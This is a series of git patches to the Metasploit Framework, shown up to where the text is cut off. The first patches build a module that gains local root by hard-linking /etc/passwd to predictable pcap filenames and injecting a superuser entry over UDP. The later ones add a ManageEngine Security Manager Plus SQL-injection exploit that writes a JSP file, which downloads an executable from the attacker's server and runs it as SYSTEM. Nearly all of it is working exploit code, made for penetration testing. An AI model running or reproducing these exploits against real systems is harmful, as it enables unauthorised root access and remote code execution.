From d148acdce3c4a0968622933ecd6e25feec8c20f2 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Sat, 21 Jul 2012 12:18:43 +0100 Subject: [PATCH 01/74] added exploit for metasploit pcap_log prov-esc --- .../post/multi/escalate/metasploit_pcaplog.rb | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 modules/post/multi/escalate/metasploit_pcaplog.rb diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb new file mode 100644 index 0000000000..92537dd465 --- /dev/null +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -0,0 +1,102 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/local/linux_kernel' +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/local/unix' + +load 'lib/msf/core/post/common.rb' +load 'lib/msf/core/post/file.rb' +load 'lib/msf/core/exploit/local/unix.rb' +load 'lib/msf/core/exploit/local/linux.rb' + +class Metasploit3 < Msf::Post + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Common + + include Msf::Exploit::Local::Linux + include Msf::Exploit::Local::Unix + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Metasploit pcap_log Local Privilege Escalation', + 'Description' => %q{ + Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings, + creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these + filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. + This, and all the other packets, are appended to /etc/passwd. + + Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + + This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. + }, + 'License' => MSF_LICENSE, + 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], + 'Platform' => [ 'linux','unix','bsd' ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'References' => + [ + [ 'BID', '54472' ], + [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'], + [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ], + ], + 'DisclosureDate' => "Jul 16 2012", + 'Targets' => + [ + [ 'Linux/Unix Universal', {} ], + ], + 'DefaultTarget' => 0, + } + )) + register_options( + [ + Opt::RPORT(2940) + ], self) + end + + def run + print_status "Waiting for victim" + initial_size = cmd_exec("cat /etc/passwd | wc -l") + i = 60 + while(true) do + if (i == 60) then + # 0a2940: cmd_exec is slow, so send 1 command to do all the links + cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + i = 0 + end + i = i+1 + if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + # PCAP is flowing + pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + print_status("Sending file contents payload to #{session.session_host}") + udpsock = Rex::Socket::Udp.create( + { + 'Context' => {'Msf' => framework, 'MsfExploit'=>self} + }) + udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + break + end + sleep(1) + end + + if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") + then + print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + else + print_error("Failed. You should manually verify the 'metasploit' user has not been added") + end + # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload + # However beceause the session is not a terminal, su will not always allow this. + end +end From 176f6ea41e66e036ef05a137442d076c49fa45c1 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Sun, 5 Aug 2012 18:20:44 +0200 Subject: [PATCH 02/74] added USERNAME and PASSWORD as options --- modules/post/multi/escalate/metasploit_pcaplog.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 92537dd465..268d18a472 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post filenames to /etc/passwd, then sending a packet with a priviliged user entry contained within. This, and all the other packets, are appended to /etc/passwd. - Successful exploitation results in the creation of a 'metasploit' superuser with password 'metasploit'. + Successful exploitation results in the creation of a new superuser account. This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd. }, @@ -60,8 +60,10 @@ class Metasploit3 < Msf::Post } )) register_options( - [ - Opt::RPORT(2940) + [ + Opt::RPORT(2940), + OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) ], self) end @@ -78,7 +80,7 @@ class Metasploit3 < Msf::Post i = i+1 if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then # PCAP is flowing - pkt = "\n\nmetasploit:me6dSmAVu0TRU:0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" + pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { @@ -99,4 +101,4 @@ class Metasploit3 < Msf::Post # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end +end \ No newline at end of file From f5b3886e8cff7ac30754da73dfaeac3d9749ab54 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Mon, 6 Aug 2012 10:41:55 +0200 Subject: [PATCH 03/74] fix success/fail print statements --- modules/post/multi/escalate/metasploit_pcaplog.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 268d18a472..c4a22596e3 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") then - print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.") + print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else - print_error("Failed. You should manually verify the 'metasploit' user has not been added") + print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. From f728d32f60e59e7df2fbc5b2586bf8ffda7ab136 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:14:45 +0200 Subject: [PATCH 04/74] code style improvement - remove 'then' from 'if's --- modules/post/multi/escalate/metasploit_pcaplog.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index c4a22596e3..87afaf301c 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Post initial_size = cmd_exec("cat /etc/passwd | wc -l") i = 60 while(true) do - if (i == 60) then + if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 - if(cmd_exec("cat /etc/passwd | wc -l") != initial_size) then + if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" print_status("Sending file contents payload to #{session.session_host}") @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") - then print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") else print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") From f48f77c0d7a53ea032460fec147559c0417d84c5 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:19:00 +0200 Subject: [PATCH 05/74] compatibility improvement - backticks not $() For the comments above, and the fact we're using backticks later in the line also (uniformity++) --- modules/post/multi/escalate/metasploit_pcaplog.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 87afaf301c..0c2bd28476 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post while(true) do if (i == 60) # 0a2940: cmd_exec is slow, so send 1 command to do all the links - cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") + cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") i = 0 end i = i+1 From 733f656b004b487edc748c261a8e80483000f18f Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Thu, 13 Sep 2012 11:32:10 +0200 Subject: [PATCH 06/74] code style improvement - start counter at 0 --- modules/post/multi/escalate/metasploit_pcaplog.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 0c2bd28476..8853855a68 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -70,14 +70,12 @@ class Metasploit3 < Msf::Post def run print_status "Waiting for victim" initial_size = cmd_exec("cat /etc/passwd | wc -l") - i = 60 + i = 0 while(true) do - if (i == 60) + if (i == 0) # 0a2940: cmd_exec is slow, so send 1 command to do all the links cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") - i = 0 end - i = i+1 if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" @@ -89,7 +87,8 @@ class Metasploit3 < Msf::Post udpsock.sendto(pkt, session.session_host, datastore['RPORT']) break end - sleep(1) + sleep(1) # wait a second + i = (i+1) % 60 # increment second counter end if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") From cbce2c0fd57b58f2861666585acc36249c46d0d4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 17 Oct 2012 17:30:30 -0500 Subject: [PATCH 07/74] Loop management, timeouts, and verbosity Add a todo for cred recording. Allow the user to determine when to give up. Changes while true to simply loop. Clear up some of the boolean checks. Inform the user what's going on. --- .../post/multi/escalate/metasploit_pcaplog.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 8853855a68..52feb3c0b1 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -20,7 +20,7 @@ load 'lib/msf/core/exploit/local/unix.rb' load 'lib/msf/core/exploit/local/linux.rb' class Metasploit3 < Msf::Post - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Post::File include Msf::Post::Common @@ -63,28 +63,40 @@ class Metasploit3 < Msf::Post [ Opt::RPORT(2940), OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]), - OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]) + OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ]), + OptInt.new("MINUTES", [true, "Number of minutes to try to inject", 5]) ], self) end + def normalize_minutes + datastore["MINUTES"].abs rescue 0 + end + def run - print_status "Waiting for victim" + print_status "Setting up the victim's /tmp dir" initial_size = cmd_exec("cat /etc/passwd | wc -l") + print_status "/etc/passwd is currently #{initial_size} lines long" i = 0 - while(true) do + j = 0 + loop do if (i == 0) + j += 1 + break if j >= datastore['MINUTES'] + 1 # Give up after X minutes # 0a2940: cmd_exec is slow, so send 1 command to do all the links + print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})" cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done") end - if (cmd_exec("cat /etc/passwd | wc -l") != initial_size) + current_size = cmd_exec("cat /etc/passwd | wc -l") + if current_size == initial_size # PCAP is flowing pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n" - print_status("Sending file contents payload to #{session.session_host}") + vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}") udpsock = Rex::Socket::Udp.create( { 'Context' => {'Msf' => framework, 'MsfExploit'=>self} }) - udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + res = udpsock.sendto(pkt, session.session_host, datastore['RPORT']) + else break end sleep(1) # wait a second @@ -93,10 +105,11 @@ class Metasploit3 < Msf::Post if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true") print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account") + # TODO: Consider recording our now-created username and password as a valid credential here. else - print_error("Failed. You should manually verify the '" + datastore['USERNAME'] + "' user has not been added") + print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added") end # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload # However beceause the session is not a terminal, su will not always allow this. end -end \ No newline at end of file +end From 2484bb02cf93aa06bc75fff9198e495bbb27f4fb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 22 Oct 2012 22:41:30 -0500 Subject: [PATCH 08/74] Add the initial version of the module From EDB. --- .../exploits/multi/http/manage_engine_sqli.rb | 218 ++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/exploits/multi/http/manage_engine_sqli.rb diff --git a/modules/exploits/multi/http/manage_engine_sqli.rb b/modules/exploits/multi/http/manage_engine_sqli.rb new file mode 100644 index 0000000000..31eb68e69e --- /dev/null +++ b/modules/exploits/multi/http/manage_engine_sqli.rb @@ -0,0 +1,218 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Security Manager Plus <=5.5 build 5505 remote code execution", + 'Description' => %q{ + This module exploits a SQL injection found in ManageEngine Security Manager Plus + advanced search page. It will send a malicious SQL query to create a JSP file + under the web root directory, and then let it download and execute our malicious + executable under the context of SYSTEM. No authentication is necessary to exploit this. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence' # Discovery & Metasploit module + ], + 'References' => + [ + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'win', + 'Targets' => + [ + # Win XP / 2003 / Vista / Win 7 / etc + ['Windows Universal', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]), + ], self.class) + end + + + # + # A very gentle check to see if Security Manager Plus exists or not + # + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/SecurityManager.cc' + }) + + if res and res.body =~ /\Security Manager Plus\<\/title\>/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + # + # Remove the JSP once we get a shell. + # We cannot delete the executable because it will still be in use. + # + def on_new_session(cli) + if cli.type != 'meterpreter' + print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") + return + end + + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + + begin + # jsp = @outpath.gsub(/\//, "\\\\") + # jsp = jsp.gsub(/"/, "") + vprint_status("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + rescue ::Exception => e + print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + end + end + + + # + # Transfer the malicious executable to our victim + # + def on_client_connect(cli) + print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") + cli.put(@native_payload) + service.close_client(cli) + end + + + # + # Generate a download+exe JSP payload + # + def generate_jsp_payload + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] + my_port = datastore['SRVPORT'] + + # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\ + # This will download our malicious executable in base64 format, decode it back, + # save it as a temp file, and then finally execute it. + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + + <% + StringBuffer buf = new StringBuffer(); + byte[] shellcode = null; + BufferedOutputStream outstream = null; + try { + Socket s = new Socket("#{my_host}", #{my_port}); + BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); + while (buf.length() < #{@native_payload.length}) { + buf.append( (char) r.read()); + } + + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); + + File temp = File.createTempFile("#{@native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); + + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); + + Process p = Runtime.getRuntime().exec(path); + } catch (Exception e) {} + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + + jsp.unpack("H*")[0] + end + + + # + # Run the actual exploit + # + def inject_exec + # This little lag is meant to ensure the TCP server runs first before the requests + select(nil, nil, nil, 1) + + # Inject our JSP payload + print_status("#{rhost}:#{rport} - Sending JSP payload") + pass = rand_text_alpha(rand(10)+5) + hex_jsp = generate_jsp_payload + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'headers' => { + 'Cookie' => 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;', + 'Accept-Encoding' => 'identity' + }, + 'vars_post' => { + 'ANDOR' => 'and', + 'condition_1' => 'OpenPorts@PORT', + 'operator_1' => 'IN', + 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'COUNT' => '1' + } + }) + + print_status("#{rhost}:#{rport} - Sending pwnage /#{@jsp_name + '.jsp'}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{@jsp_name + '.jsp'}", + 'headers' => { + 'Cookie' => 'pwnage' + } + }) + + handler + end + + + # + # The server must start first, and then we send the malicious requests + # + def exploit + # Avoid passing this as an argument for performance reasons + # This is in base64 is make sure our file isn't mangled + @native_payload = [generate_payload_exe].pack("m*") + @native_payload_name = rand_text_alpha(rand(6)+3) + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + + begin + t = framework.threads.spawn("reqs", false) { inject_exec } + print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") + super + ensure + t.kill + end + end +end \ No newline at end of file From 5072156df6a965e87e8ac1fc9a93759bb4144ccb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 22 Oct 2012 23:01:58 -0500 Subject: [PATCH 09/74] Designed specifically for Windows, so let's move to Windows Plus additional fixes --- .../exploits/multi/http/manage_engine_sqli.rb | 218 ------------------ .../windows/http/manage_engine_sqli.rb | 208 +++++++++++++++++ 2 files changed, 208 insertions(+), 218 deletions(-) delete mode 100644 modules/exploits/multi/http/manage_engine_sqli.rb create mode 100644 modules/exploits/windows/http/manage_engine_sqli.rb diff --git a/modules/exploits/multi/http/manage_engine_sqli.rb b/modules/exploits/multi/http/manage_engine_sqli.rb deleted file mode 100644 index 31eb68e69e..0000000000 --- a/modules/exploits/multi/http/manage_engine_sqli.rb +++ /dev/null @@ -1,218 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::TcpServer - include Msf::Exploit::EXE - - def initialize(info={}) - super(update_info(info, - 'Name' => "ManageEngine Security Manager Plus <=5.5 build 5505 remote code execution", - 'Description' => %q{ - This module exploits a SQL injection found in ManageEngine Security Manager Plus - advanced search page. It will send a malicious SQL query to create a JSP file - under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. No authentication is necessary to exploit this. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'xistence' # Discovery & Metasploit module - ], - 'References' => - [ - ], - 'Payload' => - { - 'BadChars' => "\x00", - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none" - }, - 'Platform' => 'win', - 'Targets' => - [ - # Win XP / 2003 / Vista / Win 7 / etc - ['Windows Universal', {}] - ], - 'Privileged' => false, - 'DisclosureDate' => "Oct 18 2012", - 'DefaultTarget' => 0)) - - register_options( - [ - OptPort.new('RPORT', [true, 'The target port', 6262]), - ], self.class) - end - - - # - # A very gentle check to see if Security Manager Plus exists or not - # - def check - res = send_request_raw({ - 'method' => 'GET', - 'uri' => '/SecurityManager.cc' - }) - - if res and res.body =~ /\Security Manager Plus\<\/title\>/ - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end - end - - - # - # Remove the JSP once we get a shell. - # We cannot delete the executable because it will still be in use. - # - def on_new_session(cli) - if cli.type != 'meterpreter' - print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") - return - end - - cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") - - begin - # jsp = @outpath.gsub(/\//, "\\\\") - # jsp = jsp.gsub(/"/, "") - vprint_status("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") - cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") - print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") - rescue ::Exception => e - print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") - end - end - - - # - # Transfer the malicious executable to our victim - # - def on_client_connect(cli) - print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") - cli.put(@native_payload) - service.close_client(cli) - end - - - # - # Generate a download+exe JSP payload - # - def generate_jsp_payload - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] - my_port = datastore['SRVPORT'] - - # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\ - # This will download our malicious executable in base64 format, decode it back, - # save it as a temp file, and then finally execute it. - jsp = %Q| - <%@page import="java.io.*"%> - <%@page import="java.net.*"%> - <%@page import="sun.misc.BASE64Decoder"%> - - <% - StringBuffer buf = new StringBuffer(); - byte[] shellcode = null; - BufferedOutputStream outstream = null; - try { - Socket s = new Socket("#{my_host}", #{my_port}); - BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); - while (buf.length() < #{@native_payload.length}) { - buf.append( (char) r.read()); - } - - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); - - File temp = File.createTempFile("#{@native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); - - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); - - Process p = Runtime.getRuntime().exec(path); - } catch (Exception e) {} - %> - | - - jsp = jsp.gsub(/\n/, '') - jsp = jsp.gsub(/\t/, '') - - jsp.unpack("H*")[0] - end - - - # - # Run the actual exploit - # - def inject_exec - # This little lag is meant to ensure the TCP server runs first before the requests - select(nil, nil, nil, 1) - - # Inject our JSP payload - print_status("#{rhost}:#{rport} - Sending JSP payload") - pass = rand_text_alpha(rand(10)+5) - hex_jsp = generate_jsp_payload - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', - 'headers' => { - 'Cookie' => 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;', - 'Accept-Encoding' => 'identity' - }, - 'vars_post' => { - 'ANDOR' => 'and', - 'condition_1' => 'OpenPorts@PORT', - 'operator_1' => 'IN', - 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", - 'COUNT' => '1' - } - }) - - print_status("#{rhost}:#{rport} - Sending pwnage /#{@jsp_name + '.jsp'}") - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{@jsp_name + '.jsp'}", - 'headers' => { - 'Cookie' => 'pwnage' - } - }) - - handler - end - - - # - # The server must start first, and then we send the malicious requests - # - def exploit - # Avoid passing this as an argument for performance reasons - # This is in base64 is make sure our file isn't mangled - @native_payload = [generate_payload_exe].pack("m*") - @native_payload_name = rand_text_alpha(rand(6)+3) - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" - - begin - t = framework.threads.spawn("reqs", false) { inject_exec } - print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") - super - ensure - t.kill - end - end -end \ No newline at end of file diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb new file mode 100644 index 0000000000..064c335731 --- /dev/null +++ b/modules/exploits/windows/http/manage_engine_sqli.rb @@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", + 'Description' => %q{ + This module exploits a SQL injection found in ManageEngine Security Manager Plus + advanced search page. It will send a malicious SQL query to create a JSP file + under the web root directory, and then let it download and execute our malicious + executable under the context of SYSTEM. No authentication is necessary to exploit this. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence' # Discovery & Metasploit module + ], + 'References' => + [ + ['EDB','22094'] + ], + 'Platform' => 